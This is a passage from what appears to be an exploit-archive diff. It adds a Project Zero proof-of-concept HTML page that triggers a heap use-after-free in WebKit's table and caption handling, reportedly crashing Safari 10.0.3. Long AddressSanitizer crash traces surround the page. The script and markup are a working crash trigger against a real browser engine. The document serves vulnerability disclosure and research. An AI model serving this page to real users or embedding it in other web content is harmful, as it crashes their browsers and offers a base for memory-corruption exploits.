#17 0x10e7d81f8 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7ae1f8)
#18 0x10e79c86f in WebCore::DocumentLoader::finishedLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77286f)
#19 0x10e27cfb7 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x252fb7)
#20 0x10e277b69 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24db69)
#21 0x1108287e4 in WebCore::SubresourceLoader::didFinishLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27fe7e4)
#22 0x107099615 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(double)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(double)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8de615)
#23 0x107098c2a in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8ddc2a)
#24 0x106a471f9 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x28c1f9)
#25 0x10686a448 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xaf448)
#26 0x106873614 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xb8614)
#27 0x10bd53ab3 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b6ab3)
#28 0x10bd55f1e in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b8f1e)
#29 0x7fffa0f3c7e0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0xaa7e0)
SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xba8a) in WebCore::Node::parentNode() const
Shadow bytes around the buggy address:
0x1c0e0000c9b0: fa fa fa fa 00 00 00 00 00 00 00 00 00 06 fa fa
0x1c0e0000c9c0: fa fa 00 00 00 00 00 00 00 00 04 fa fa fa fa fa
0x1c0e0000c9d0: 00 00 00 00 00 00 00 00 04 fa fa fa fa fa 00 00
0x1c0e0000c9e0: 00 00 00 00 00 00 04 fa fa fa fa fa fd fd fd fd
0x1c0e0000c9f0: fd fd fd fd fd fa fa fa fa fa 00 00 00 00 00 00
=>0x1c0e0000ca00: 00 00 00 fa fa fa fa fa fd fd fd[fd]fd fd fd fd
0x1c0e0000ca10: fd fa fa fa fa fa 00 00 00 00 00 00 00 00 00 fa
0x1c0e0000ca20: fa fa fa fa 00 00 00 00 00 00 00 00 00 fa fa fa
0x1c0e0000ca30: fa fa 00 00 00 00 00 00 00 00 00 fa fa fa fa fa
0x1c0e0000ca40: fd fd fd fd fd fd fd fd fd fd fa fa fa fa 00 00
0x1c0e0000ca50: 00 00 00 00 00 00 00 fa fa fa fa fa fd fd fd fd
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Container overflow: fc
Array cookie: ac
Intra object redzone: bb
ASan internal: fe
Left alloca redzone: ca
Right alloca redzone: cb
==570==ABORTING
-->

192
platforms/multiple/dos/41813.html Executable file
View file

@ -0,0 +1,192 @@
<!--
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1105
There is a use-after-free security vulnerability in WebKit. The vulnerability was confirmed on a nightly version of WebKit. The PoC has also been observed to crash Safari 10.0.3 on Mac.
PoC:
=================================================================
-->
<style>
* { -webkit-border-image: url(#foo) 1 5 1 63 repeat; -webkit-flow-into: foo }
</style>
<script>
function eventhandler() {
var a;
document.execCommand("selectAll", false);
output.slot = "foo";
table.deleteCaption();
//trigger garbage collector
for(var i=0;i<100;i++) {
a = new Uint8Array(1024*1024);
}
}
</script>
<table id="table">
<caption>
<summary>
<output id="output">
<table>
<th>foo</th>
</table>
</table>
<iframe onload="eventhandler()"></iframe>
<!--
=================================================================
ASan log:
=================================================================
==1460==ERROR: AddressSanitizer: heap-use-after-free on address 0x60c00009d4a0 at pc 0x0001136e25ab bp 0x7fff53da1c30 sp 0x7fff53da1c28
READ of size 8 at 0x60c00009d4a0 thread T0
#0 0x1136e25aa in WebCore::Node::treeScope() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x45aa)
#1 0x1136e2568 in WebCore::Node::document() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x4568)
#2 0x1136e1b18 in WebCore::RenderObject::document() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x3b18)
#3 0x11372ca48 in WebCore::RenderObject::view() const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x4ea48)
#4 0x115a56771 in WebCore::RenderTable::markForPaginationRelayoutIfNeeded() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2378771)
#5 0x11571a1e2 in WebCore::RenderBlockFlow::layoutBlockChild(WebCore::RenderBox&, WebCore::RenderBlockFlow::MarginInfo&, WebCore::LayoutUnit&, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x203c1e2)
#6 0x115716802 in WebCore::RenderBlockFlow::layoutBlockChildren(bool, WebCore::LayoutUnit&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2038802)
#7 0x115714b5a in WebCore::RenderBlockFlow::layoutBlock(bool, WebCore::LayoutUnit) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2036b5a)
#8 0x1156d3e24 in WebCore::RenderBlock::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1ff5e24)
#9 0x1158165e1 in WebCore::RenderFlowThread::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x21385e1)
#10 0x11596beed in WebCore::RenderNamedFlowThread::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x228deed)
#11 0x1140766d7 in WebCore::FlowThreadController::layoutRenderNamedFlowThreads() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x9986d7)
#12 0x115adaabb in WebCore::RenderView::layout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x23fcabb)
#13 0x11417e90f in WebCore::FrameView::layout(bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xaa090f)
#14 0x113dd3a57 in WebCore::Document::updateLayout() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x6f5a57)
#15 0x115ad9bd1 in WebCore::RenderView::hitTest(WebCore::HitTestRequest const&, WebCore::HitTestLocation const&, WebCore::HitTestResult&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x23fbbd1)
#16 0x113de387e in WebCore::Document::prepareMouseEvent(WebCore::HitTestRequest const&, WebCore::LayoutPoint const&, WebCore::PlatformMouseEvent const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x70587e)
#17 0x113fa8dca in WebCore::EventHandler::prepareMouseEvent(WebCore::HitTestRequest const&, WebCore::PlatformMouseEvent const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8cadca)
#18 0x113fa95ac in WebCore::EventHandler::handleMouseMoveEvent(WebCore::PlatformMouseEvent const&, WebCore::HitTestResult*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8cb5ac)
#19 0x113fa9052 in WebCore::EventHandler::mouseMoved(WebCore::PlatformMouseEvent const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x8cb052)
#20 0x11620a7ef in WebCore::UserInputBridge::handleMouseMoveEvent(WebCore::PlatformMouseEvent const&, WebCore::InputSource) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2b2c7ef)
#21 0x10c5163b2 in WebKit::handleMouseEvent(WebKit::WebMouseEvent const&, WebKit::WebPage*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x6a73b2)
#22 0x10c515e37 in WebKit::WebPage::mouseEvent(WebKit::WebMouseEvent const&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x6a6e37)
#23 0x10c57af17 in void IPC::handleMessage<Messages::WebPage::MouseEvent, WebKit::WebPage, void (WebKit::WebPage::*)(WebKit::WebMouseEvent const&)>(IPC::Decoder&, WebKit::WebPage*, void (WebKit::WebPage::*)(WebKit::WebMouseEvent const&)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x70bf17)
#24 0x10c56f4bc in WebKit::WebPage::didReceiveWebPageMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x7004bc)
#25 0x10c524ac1 in WebKit::WebPage::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x6b5ac1)
#26 0x10c031a3b in IPC::MessageReceiverMap::dispatchMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x1c2a3b)
#27 0x10c6aaff4 in WebKit::WebProcess::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x83bff4)
#28 0x10bf1e448 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xaf448)
#29 0x10bf27614 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xb8614)
#30 0x111406a04 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b6a04)
#31 0x111408f1e in WTF::RunLoop::performWork(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b8f1e)
#32 0x7fff93c2b7e0 in __CFRUNLOOP_IS_CALLING_OUT_TO_A_SOURCE0_PERFORM_FUNCTION__ (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0xaa7e0)
#33 0x7fff93c0af1b in __CFRunLoopDoSources0 (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x89f1b)
#34 0x7fff93c0a43e in __CFRunLoopRun (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x8943e)
#35 0x7fff93c09e37 in CFRunLoopRunSpecific (/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation+0x88e37)
#36 0x7fff91e23934 in RunCurrentEventLoopInMode (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x30934)
#37 0x7fff91e2376e in ReceiveNextEventCommon (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x3076e)
#38 0x7fff91e235ae in _BlockUntilNextEventMatchingListInModeWithFilter (/System/Library/Frameworks/Carbon.framework/Versions/A/Frameworks/HIToolbox.framework/Versions/A/HIToolbox+0x305ae)
#39 0x7fff880b1df5 in _DPSNextEvent (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48df5)
#40 0x7fff880b1225 in -[NSApplication _nextEventMatchingEventMask:untilDate:inMode:dequeue:] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x48225)
#41 0x7fff880a5d7f in -[NSApplication run] (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x3cd7f)
#42 0x7fff8806f367 in NSApplicationMain (/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit+0x6367)
#43 0x7fff8d65e193 in _xpc_objc_main (/usr/lib/system/libxpc.dylib+0x11193)
#44 0x7fff8d65cbbd in xpc_main (/usr/lib/system/libxpc.dylib+0xfbbd)
#45 0x10be58b73 in main (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/XPCServices/com.apple.WebKit.WebContent.xpc/Contents/MacOS/com.apple.WebKit.WebContent.Development+0x100001b73)
#46 0x7fff9716d5ac in start (/usr/lib/system/libdyld.dylib+0x35ac)
0x60c00009d4a0 is located 32 bytes inside of 120-byte region [0x60c00009d480,0x60c00009d4f8)
freed by thread T0 here:
#0 0x10e428cf4 in __sanitizer_mz_free (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4bcf4)
#1 0x11145136f in bmalloc::Deallocator::deallocateSlowCase(void*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x190136f)
#2 0x113a86653 in WebCore::removeDetachedChildrenInContainer(WebCore::ContainerNode&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x3a8653)
#3 0x113a73752 in WebCore::ContainerNode::~ContainerNode() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x395752)
#4 0x1143df19d in WebCore::HTMLTableCaptionElement::~HTMLTableCaptionElement() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd0119d)
#5 0x110d42ee7 in JSC::JSCell::callDestructor(JSC::VM&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x11f2ee7)
#6 0x110e4523a in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<(JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1>()::'lambda'(unsigned long)::operator()(unsigned long) const (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f523a)
#7 0x110e44f1e in JSC::FreeList JSC::MarkedBlock::Handle::specializedSweep<(JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1, (JSC::MarkedBlock::Handle::MarksMode)1>() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f4f1e)
#8 0x110e44892 in JSC::FreeList JSC::MarkedBlock::Handle::sweepHelperSelectMarksMode<(JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1>() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f4892)
#9 0x110e43212 in JSC::FreeList JSC::MarkedBlock::Handle::sweepHelperSelectSweepMode<(JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0, (JSC::MarkedBlock::Handle::NewlyAllocatedMode)1>(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f3212)
#10 0x110e40823 in JSC::FreeList JSC::MarkedBlock::Handle::sweepHelperSelectHasNewlyAllocated<(JSC::MarkedBlock::Handle::EmptyMode)1, (JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0>(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12f0823)
#11 0x110e3b130 in JSC::FreeList JSC::MarkedBlock::Handle::sweepHelperSelectEmptyMode<(JSC::MarkedBlock::Handle::SweepDestructionMode)1, (JSC::MarkedBlock::Handle::ScribbleMode)0>(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12eb130)
#12 0x110e28f80 in JSC::FreeList JSC::MarkedBlock::Handle::sweepHelperSelectScribbleMode<(JSC::MarkedBlock::Handle::SweepDestructionMode)1>(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12d8f80)
#13 0x110e28dfc in JSC::MarkedBlock::Handle::sweep(JSC::MarkedBlock::Handle::SweepMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12d8dfc)
#14 0x110e24c54 in JSC::MarkedAllocator::tryAllocateIn(JSC::MarkedBlock::Handle*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12d4c54)
#15 0x110e246a8 in JSC::MarkedAllocator::tryAllocateWithoutCollecting() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12d46a8)
#16 0x110e2550e in JSC::MarkedAllocator::allocateSlowCaseImpl(JSC::GCDeferralContext*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x12d550e)
#17 0x11094538a in void* JSC::allocateCell<JSC::InferredValue>(JSC::Heap&, unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xdf538a)
#18 0x110944962 in JSC::InferredValue::create(JSC::VM&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0xdf4962)
#19 0x1111e3020 in JSC::SymbolTable::finishCreation(JSC::VM&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1693020)
#20 0x1139b8b4a in JSC::SymbolTable::create(JSC::VM&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2dab4a)
#21 0x1139b8719 in JSC::JSSegmentedVariableObject::finishCreation(JSC::VM&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x2da719)
#22 0x1148d82bc in JSC::JSGlobalObject::finishCreation(JSC::VM&, JSC::JSObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x11fa2bc)
#23 0x1148d8281 in WebCore::JSDOMGlobalObject::finishCreation(JSC::VM&, JSC::JSObject*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x11fa281)
#24 0x114a23db5 in WebCore::JSDOMWindowBase::finishCreation(JSC::VM&, WebCore::JSDOMWindowShell*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1345db5)
#25 0x114944bdc in WebCore::JSDOMWindow::finishCreation(JSC::VM&, WebCore::JSDOMWindowShell*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1266bdc)
#26 0x114a2f56b in WebCore::JSDOMWindow::create(JSC::VM&, JSC::Structure*, WTF::Ref<WebCore::DOMWindow>&&, WebCore::JSDOMWindowShell*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x135156b)
#27 0x114a2ee7e in WebCore::JSDOMWindowShell::setWindow(WTF::RefPtr<WebCore::DOMWindow>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x1350e7e)
#28 0x115bb4503 in WebCore::JSDOMWindowShell::create(JSC::VM&, WTF::RefPtr<WebCore::DOMWindow>&&, JSC::Structure*, WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24d6503)
#29 0x115bb41b0 in WebCore::ScriptController::createWindowShell(WebCore::DOMWrapperWorld&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24d61b0)
previously allocated by thread T0 here:
#0 0x10e428790 in __sanitizer_mz_malloc (/Applications/Xcode.app/Contents/Developer/Toolchains/XcodeDefault.xctoolchain/usr/lib/clang/8.0.0/lib/darwin/libclang_rt.asan_osx_dynamic.dylib+0x4b790)
#1 0x7fff8b1325a0 in malloc_zone_malloc (/usr/lib/system/libsystem_malloc.dylib+0x25a0)
#2 0x11145adb4 in bmalloc::DebugHeap::malloc(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x190adb4)
#3 0x11145012b in bmalloc::Allocator::allocateSlowCase(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x190012b)
#4 0x1113e7995 in bmalloc::Allocator::allocate(unsigned long) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x1897995)
#5 0x1143e0e3d in WebCore::HTMLTableElement::create(WebCore::QualifiedName const&, WebCore::Document&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd02e3d)
#6 0x11430d631 in WebCore::tableConstructor(WebCore::QualifiedName const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc2f631)
#7 0x114308373 in WebCore::HTMLElementFactory::createKnownElement(WTF::AtomicString const&, WebCore::Document&, WebCore::HTMLFormElement*, bool) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc2a373)
#8 0x1142c5ea6 in WebCore::HTMLConstructionSite::createHTMLElementOrFindCustomElementInterface(WebCore::AtomicHTMLToken&, WebCore::JSCustomElementInterface**) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbe7ea6)
#9 0x1142c51a5 in WebCore::HTMLConstructionSite::createHTMLElement(WebCore::AtomicHTMLToken&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbe71a5)
#10 0x1142c58e6 in WebCore::HTMLConstructionSite::insertHTMLElement(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xbe78e6)
#11 0x1144224b3 in WebCore::HTMLTreeBuilder::processStartTagForInBody(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd444b3)
#12 0x11441f4d6 in WebCore::HTMLTreeBuilder::processStartTag(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd414d6)
#13 0x11441d67e in WebCore::HTMLTreeBuilder::constructTree(WebCore::AtomicHTMLToken&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xd3f67e)
#14 0x1142f2d48 in WebCore::HTMLDocumentParser::constructTreeFromHTMLToken(WebCore::HTMLTokenizer::TokenPtr&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc14d48)
#15 0x1142f2902 in WebCore::HTMLDocumentParser::pumpTokenizerLoop(WebCore::HTMLDocumentParser::SynchronousMode, bool, WebCore::PumpSession&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc14902)
#16 0x1142f1b94 in WebCore::HTMLDocumentParser::pumpTokenizer(WebCore::HTMLDocumentParser::SynchronousMode) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc13b94)
#17 0x1142f358d in WebCore::HTMLDocumentParser::append(WTF::RefPtr<WTF::StringImpl>&&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0xc1558d)
#18 0x113d60661 in WebCore::DecodedDataDocumentParser::flush(WebCore::DocumentWriter&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x682661)
#19 0x113e8c1f8 in WebCore::DocumentWriter::end() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x7ae1f8)
#20 0x113e5086f in WebCore::DocumentLoader::finishedLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x77286f)
#21 0x113930fb7 in WebCore::CachedResource::checkNotify() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x252fb7)
#22 0x11392bb69 in WebCore::CachedRawResource::finishLoading(WebCore::SharedBuffer*) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x24db69)
#23 0x115edc7e4 in WebCore::SubresourceLoader::didFinishLoading(double) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x27fe7e4)
#24 0x10c74d615 in void IPC::handleMessage<Messages::WebResourceLoader::DidFinishResourceLoad, WebKit::WebResourceLoader, void (WebKit::WebResourceLoader::*)(double)>(IPC::Decoder&, WebKit::WebResourceLoader*, void (WebKit::WebResourceLoader::*)(double)) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8de615)
#25 0x10c74cc2a in WebKit::WebResourceLoader::didReceiveWebResourceLoaderMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x8ddc2a)
#26 0x10c0fb1f9 in WebKit::NetworkProcessConnection::didReceiveMessage(IPC::Connection&, IPC::Decoder&) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0x28c1f9)
#27 0x10bf1e448 in IPC::Connection::dispatchMessage(std::__1::unique_ptr<IPC::Decoder, std::__1::default_delete<IPC::Decoder> >) (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xaf448)
#28 0x10bf27614 in IPC::Connection::dispatchOneMessage() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebKit.framework/Versions/A/WebKit+0xb8614)
#29 0x111406a04 in WTF::RunLoop::performWork() (/Users/projectzero/webkit/webkit/WebKitBuild/Release/JavaScriptCore.framework/Versions/A/JavaScriptCore+0x18b6a04)
SUMMARY: AddressSanitizer: heap-use-after-free (/Users/projectzero/webkit/webkit/WebKitBuild/Release/WebCore.framework/Versions/A/WebCore+0x45aa) in WebCore::Node::treeScope() const
Shadow bytes around the buggy address:
0x1c1800013a40: fa fa fa fa fa fa fa fa 00 00 00 00 00 00 00 00
